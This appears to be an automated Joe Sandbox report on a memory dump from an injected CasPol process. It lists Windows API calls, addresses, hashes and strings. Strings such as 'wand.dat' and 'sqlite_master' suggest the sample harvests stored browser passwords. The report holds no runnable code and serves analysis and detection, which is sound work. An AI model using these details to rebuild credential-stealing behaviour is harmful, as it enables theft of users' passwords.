                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                  • API String ID: 1297977491-2063813899
                                                                                                                                                                                  • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                  • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                  • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                  • String ID: *.*$dat$wand.dat
                                                                                                                                                                                  • API String ID: 2618321458-1828844352
                                                                                                                                                                                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                  • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                  • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1549203181-0
                                                                                                                                                                                  • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                  • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                  • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00412057
                                                                                                                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3550944819-0
                                                                                                                                                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • free.MSVCRT ref: 0040F561
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$free
                                                                                                                                                                                  • String ID: g4@
                                                                                                                                                                                  • API String ID: 2888793982-2133833424
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                  • API String ID: 3510742995-2766056989
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AF07
                                                                                                                                                                                  • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                  • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1865533344-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                    • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                  • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1127616056-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                  • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID: sqlite_master
                                                                                                                                                                                  • API String ID: 438689982-3163232059
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3917621476-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 822687973-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                  • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                                                                  • free.MSVCRT ref: 0041747F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2605342592-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                  • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2678498856-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Item
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3888421826-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3727323765-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                  • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 764393265-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 979780441-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                  • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1386444988-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InvalidateMessageRectSend
                                                                                                                                                                                  • String ID: d=E
                                                                                                                                                                                  • API String ID: 909852535-3703654223
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                                                                                                  • String ID: "
                                                                                                                                                                                  • API String ID: 1983396471-123907689
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                  • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                  • String ID: URL
                                                                                                                                                                                  • API String ID: 2108176848-3574463123
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                                  • API String ID: 2789212964-323797159
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintf
                                                                                                                                                                                  • String ID: %%-%d.%ds
                                                                                                                                                                                  • API String ID: 3988819677-2008345750
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSendmemset
                                                                                                                                                                                  • String ID: F^@
                                                                                                                                                                                  • API String ID: 568519121-3652327722
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PlacementWindowmemset
                                                                                                                                                                                  • String ID: WinPos
                                                                                                                                                                                  • API String ID: 4036792311-2823255486
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@DeleteObject
                                                                                                                                                                                  • String ID: r!A
                                                                                                                                                                                  • API String ID: 1103273653-628097481
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                  • String ID: _lng.ini
                                                                                                                                                                                  • API String ID: 383090722-1948609170
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                  • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 438689982-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
